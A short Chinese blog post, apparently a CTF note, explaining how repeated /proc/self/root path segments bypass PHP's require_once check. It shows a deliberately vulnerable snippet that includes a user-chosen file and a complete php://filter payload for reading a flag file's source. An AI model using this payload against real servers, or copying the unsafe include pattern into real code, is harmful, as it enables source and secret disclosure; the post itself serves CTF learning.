require_once攻击

php中的require_once方法好include_once方法只允许对某文件包含一次,其核心原理是将包含过的文件注册到哈希表中.而我们可以通过重复使用/proc/self/root来构成哈希冲突,从而实现对一个文件的多次包含.
示例如下:

<?php
highlight_file(__FILE__);
require_once 'flag';
if(isset($_GET['file'])) {
    if(preg_match('/flag/i', $_GET['file'])) {
        require_once $_GET['file'];
    }else{
        echo "还想非预期?";
    }
}

我们可以使用如下的payload进行攻击

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag
posted @ 2024-11-29 19:29  colorfullbz  阅读(28)  评论(0)    收藏  举报